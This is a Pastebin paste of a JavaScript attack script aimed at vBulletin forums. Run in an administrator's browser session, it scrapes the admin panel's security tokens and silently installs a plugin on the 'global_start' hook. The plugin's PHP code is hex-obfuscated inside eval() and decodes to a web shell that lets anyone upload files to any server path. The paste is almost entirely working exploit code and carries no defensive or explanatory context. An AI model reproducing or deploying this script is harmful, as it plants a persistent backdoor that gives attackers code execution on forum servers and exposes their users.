Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var debug = true; //show result
- var post = getHTTPObject();
- var get = getHTTPObject();
- var admincp = "http://localhost/upload/admincp/";
- function getHTTPObject() {
- var xmlhttp;
- if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
- try{
- xmlhttp = new XMLHttpRequest();
- }catch(e){
- xmlhttp = false;
- }
- }
- return xmlhttp;
- }
- String.prototype.between = function(prefix, suffix) {
- s = this;
- var i = s.indexOf(prefix);
- if (i >= 0) {
- s = s.substring(i + prefix.length);
- }
- else {
- return '';
- }
- if (suffix) {
- i = s.indexOf(suffix);
- if (i >= 0) {
- s = s.substring(0, i);
- }
- else {
- return '';
- }
- }
- return s;
- }
- function step1(){
- var string;
- get.open("GET", admincp+"plugin.php?do=add",true);
- get.onreadystatechange=function() {
- if (get.readyState==4) {
- string = get.responseText;
- step2(string);
- }
- }
- get.send(null)
- }
- function step2(str){
- var string;
- adminhash = str.between('adminhash" value="', '" />');
- securitytoken = str.between('securitytoken" value="', '" />');
- shellcode = 'eval("\\x20\\x69\\x66\\x20\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x27\\x64\\x6f\\x27\\x5d\\x3d\\x3d\\x27\\x6c\\x6f\\x61\\x64\\x27\\x29\\x7b\\xd\\xa\\x20\\x24\\x66\\x69\\x6c\\x65\\x73\\x20\\x3d\\x20\\x40\\x24\\x5f\\x46\\x49\\x4c\\x45\\x53\\x5b\\x22\\x66\\x69\\x6c\\x65\\x73\\x22\\x5d\\x3b\\xd\\xa\\x20\\x69\\x66\\x28\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x22\\x6e\\x61\\x6d\\x65\\x22\\x5d\\x20\\x21\\x3d\\x20\\x27\\x27\\x29\\x7b\\xd\\xa\\x20\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x20\\x3d\\x20\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x70\\x61\\x74\\x68\\x22\\x5d\\x2e\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x22\\x6e\\x61\\x6d\\x65\\x22\\x5d\\x3b\\xd\\xa\\x20\\x69\\x66\\x28\\x6d\\x6f\\x76\\x65\\x5f\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x64\\x5f\\x66\\x69\\x6c\\x65\\x28\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x27\\x74\\x6d\\x70\\x5f\\x6e\\x61\\x6d\\x65\\x27\\x5d\\x2c\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x29\\x29\\x20\\x65\\x63\\x68\\x6f\\x20\\x22\\x3c\\x68\\x31\\x3e\\x3c\\x61\\x20\\x68\\x72\\x65\\x66\\x3d\\x27\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x27\\x3e\\x4f\\x4b\\x2d\\x43\\x6c\\x69\\x63\\x6b\\x20\\x68\\x65\\x72\\x65\\x21\\x3c\\x2f\\x61\\x3e\\x3c\\x2f\\x68\\x31\\x3e\\x22\\x3b\\xd\\xa\\x20\\x7d\\xd\\xa\\x20\\x64\\x69\\x65\\x28\\x27\\x3c\\x66\\x6f\\x72\\x6d\\x20\\x6d\\x65\\x74\\x68\\x6f\\x64\\x3d\\x50\\x4f\\x53\\x54\\x20\\x65\\x6e\\x63\\x74\\x79\\x70\\x65\\x3d\\x22\\x6d\\x75\\x6c\\x74\\x69\\x70\\x61\\x72\\x74\\x2f\\x66\\x6f\\x72\\x6d\\x2d\\x64\\x61\\x74\\x61\\x22\\x20\\x61\\x63\\x74\\x69\\x6f\\x6e\\x3d\\x22\\x22\\x3e\\xd\\xa\\x20\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x74\\x65\\x78\\x74\\x20\\x6e\\x61\\x6d\\x65\\x3d\\x70\\x61\\x74\\x68\\x3e\\xd\\xa\\x20\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x22\\x66\\x69\\x6c\\x65\\x22\\x20\\x6e\\x61\\x6d\\x65\\x3d\\x22\\x66\\x69\\x6c\\x65\\x73\\x22\\x3e\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x73\\x75\\x62\\x6d\\x69\\x74\\x20\\x76\\x61\\x6c\\x75\\x65\\x3d\\x22\\x55\\x70\\x22\\x3e\\x3c\\x2f\\x66\\x6f\\x72\\x6d\\x3e\\x27\\x29\\x3b\\xd\\xa\\x20\\x7d\\xd\\xa");';
- data = "do=update&adminhash="+adminhash+"&securitytoken="+securitytoken+"&product=vbulletin&hookname=global_start&title=Upload&executionorder=5&phpcode="+shellcode+"&active=1&pluginid=";
- post.onreadystatechange = function(){
- if(post.readyState == 4){
- string = post.responseText;
- if(debug == true) document.write(string);
- }
- }
- post.open("POST", admincp+"plugin.php?do=update", true);
- post.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- post.setRequestHeader("Content-length", data.length);
- post.setRequestHeader("Connection", "close");
- post.send(data);
- }
- step1();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement